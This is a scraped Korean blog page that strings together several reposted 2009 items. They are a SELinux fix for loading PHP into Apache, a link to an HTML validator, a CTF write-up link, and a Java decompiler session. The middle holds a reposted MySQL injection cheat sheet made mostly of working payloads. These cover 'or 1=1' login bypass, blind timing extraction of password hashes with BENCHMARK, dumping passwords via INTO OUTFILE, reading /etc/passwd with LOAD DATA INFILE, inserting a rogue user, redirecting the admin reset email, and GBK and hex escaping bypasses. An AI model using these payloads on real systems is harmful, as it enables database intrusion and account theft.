출 처 : http://plzu.tistory.com/55

PHP설치하고 Apache연동을 하려는데 쌩뚱맞은 에러가 나타났다.

httpd: Syntax error on line 53 of /usr/local/apache/conf/httpd.conf:
Cannot load /usr/local/apache/modules/libphp5.so into server: /usr/local/apache/modules/libphp5.so: cannot restore segment prot after reloc: Permission denied


restorecon -R -v /usr/local/apache/modules/libphp5.so

세그먼트 쪽이라서 해당 파일을 기본 설정으로 돌려보아지만 같은 에러가 나타난다.

흠... 뭐가 문제일까...
구글을 검색하여 보니 나와 같은 사람들이 많았다.
파일 설정이 아닌 문맥 오류라고 봐야 될듯 하다.

chcon -t texrel_shlib_t /usr/local/apache/modules/libphp5.so
Posted by 김주일
시스템/시스템일반2009. 3. 19. 11:21
Posted by 김주일
Posted by 김주일
출 처 : http://validator.kldp.org/

이 validator는 KLDP에서 제공하는 W3C의 한국어 HTML Validation 서비스이며, HTML, XHTML, SMIL, MathML 등 웹 문서의 markup 유효성을 검사합니다. RSS/Atom 피드, CSS 스타일 시트, 또는 깨진 링크 찾기와 같은 특정 컨텐츠를 검사하기를 원한다면, 다른 유효성 검사와 도구 문서를 참고 하십시오.

Posted by 김주일

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
に関する追加情報:

the above chars are Chinese Big5

Advanced Vectors

Using an HEX encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0×726F6F74, pass = 0×726F6F74

How to determin the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.

출 처 : http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

Posted by 김주일
나만의공간/스크랩2009. 3. 15. 14:18
와~

오우~

잘한당~

부럽다앙~



출 처 : http://vnsecurity.net/Members/lamer/archive/2009/03/11/codegate2009/
Posted by 김주일
Posted by 김주일
시스템/윈도우보안2009. 3. 14. 17:40
176p. COMRaider 찾으러 갔다가 발견 원.. 정보가 없으니..
편리하구만..



출 처 : http://labs.idefense.com/
Posted by 김주일

p.167 관련


C:\Documents and Settings\Administrator\바탕 화면>jad.exe HeaderStyle.class
Parsing HeaderStyle.class...The class file version is 48.0 (only 45.3, 46.0 and
47.0 are supported)
Overwrite HeaderStyle.jad [y/n/a/s] ? y
 Generating HeaderStyle.jad

C:\Documents and Settings\Administrator\바탕 화면>type HeaderStyle.jad
// Decompiled by Jad v1.5.8d. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name:   HeaderStyle.java

package com.jgoodies.looks;

import javax.swing.*;

public final class HeaderStyle
{

    private HeaderStyle(String name)
    {
        this.name = name;
    }

    public static HeaderStyle from(JMenuBar menuBar)
    {
        return from0(menuBar);
    }

    public static HeaderStyle from(JToolBar toolBar)
    {
        return from0(toolBar);
    }

    private static HeaderStyle from0(JComponent c)
    {
        Object value = c.getClientProperty("jgoodies.headerStyle");
        if(value instanceof HeaderStyle)
            return (HeaderStyle)value;
        if(value instanceof String)
            return valueOf((String)value);
        else
            return null;
    }

    private static HeaderStyle valueOf(String name)
    {
        if(name.equalsIgnoreCase(SINGLE.name))
            return SINGLE;
        if(name.equalsIgnoreCase(BOTH.name))
            return BOTH;
        else
            throw new IllegalArgumentException("Invalid HeaderStyle name " + nam
e);
    }

    public String toString()
    {
        return name;
    }

    public static final HeaderStyle SINGLE = new HeaderStyle("Single");
    public static final HeaderStyle BOTH = new HeaderStyle("Both");
    private final String name;

}

C:\Documents and Settings\Administrator\바탕 화면>

Posted by 김주일
Posted by 김주일